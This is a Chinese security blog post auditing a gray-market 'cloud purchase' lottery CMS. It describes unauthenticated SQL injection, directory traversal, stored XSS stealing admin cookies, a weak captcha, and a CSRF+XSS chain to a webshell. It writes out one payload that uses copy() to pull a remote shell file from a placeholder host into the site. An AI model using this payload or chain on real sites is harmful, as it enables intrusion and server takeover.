关注我们

对某灰色产业cms审计|云购CMS

昔日昔日 安全文摘 2020-02-15 12601 0

别祝我今天快乐 祝我今天有你~

    嘿嘿嘿,这是xDay团队的第一篇反黑灰产业的代码审计文章。这次给大家看的是一个曾经风靡一时的一元云购的一套程序。我就纳闷儿了...这玩意儿现在还在骗人??于是乎就开始着手挖几个洞。

0X01 目录结构

    首先我们先看一下结构,system文件夹下有相关代码。我直接给大家看一下漏洞吧。

对某灰色产业cms审计|云购CMS

0X02 审计出洞

1、购物车异步获取信息 - SQL注入

system\modules\member\cart.action.php

对某灰色产业cms审计|云购CMS

  虽然本身是过滤单引号但是在这里并没有用单引号保护起来所以这里是一个注入,并且没有验证用户身份,从站外未登陆的情况下即可进行注入。


对某灰色产业cms审计|云购CMS

直接官网哈哈哈哈!!!!


2、BOM插件 - 目录遍历

system/plugin/bom/bom.plugin.php 

对某灰色产业cms审计|云购CMS

 直接访问即可,后台即便是改了也没什么事情,照样刚!

对某灰色产业cms审计|云购CMS

3、我的晒单 - 存储型XSS(可打到管理员Cookie)

由于这套CMS出来的较早了,在此之前被许多小黑挖掘过XSS漏洞,但是....我这个XSS貌似也是0day 哈哈哈需要晒单功能这里给大家演示一下先走一遍流程


对某灰色产业cms审计|云购CMS

添加晒图

对某灰色产业cms审计|云购CMS

把图片地址改成我们的XSS语句

对某灰色产业cms审计|云购CMS

fileurl_tmp参数

对某灰色产业cms审计|云购CMS

这时候便把IMG标签闭合了弹出了1 (触发在后台管理的“晒单查看”)

对某灰色产业cms审计|云购CMS

4、上传配置 - 后台Getshell

 可能有些人看到后台有上传的地方,其实这些个上传是没有办法利用的。虽然你可以在后台改格式白名单但是依旧提不下。这时候呢....插马呗!!~~

对某灰色产业cms审计|云购CMS

由于他过滤单引号所以这里就不带上单引号了。

对某灰色产业cms审计|云购CMS

允许上传类型处,写上pyload

对某灰色产业cms审计|云购CMS

提交完就完事了~~通过copy函数远程写个马就完事了

对某灰色产业cms审计|云购CMS

5、后台验证码存在缺陷

对某灰色产业cms审计|云购CMS

 默认账户admin 这一串MD5值就是对应的验证码的值,此处可以调用接口进行爆破。也是个小小的缺陷吧

6、组合拳Getshell - CSRF+XSS

  我们直接用XSS嵌套一个html页面,然后模拟所有的操作就完事了从修改upload格式插马开始到模拟访问

[/index.php/admin/setting/upload?c=copy("http://www.xxx.com/shell.txt","../inc.php");

直接一些列打过去就完事儿了实在不放心就在最后模拟添加一个管理员就阔以了。

  这套CMS并没有过滤CSRF攻击,我也不截图了各位表哥的姿势比我骚,哇嘎嘎嘎嘎嘎嘎....需要源码可以跟我说一下(好累喔) 

文由 XDAY实验室

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址